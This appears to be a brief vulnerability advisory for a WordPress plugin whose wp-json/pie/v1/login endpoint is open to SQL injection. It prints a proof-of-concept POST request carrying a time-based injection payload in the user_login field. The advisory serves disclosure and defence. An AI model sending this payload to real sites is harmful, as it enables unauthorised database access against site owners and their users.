The plugin does not properly escape user data before using it in a SQL statement in the wp-json/pie/v1/login REST API endpoint, leading to an SQL injection.
POST /wp-json/pie/v1/login HTTP/1.1
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 43
Connection: close
user_login='%20OR%20SLEEP(1)--&login_pass=a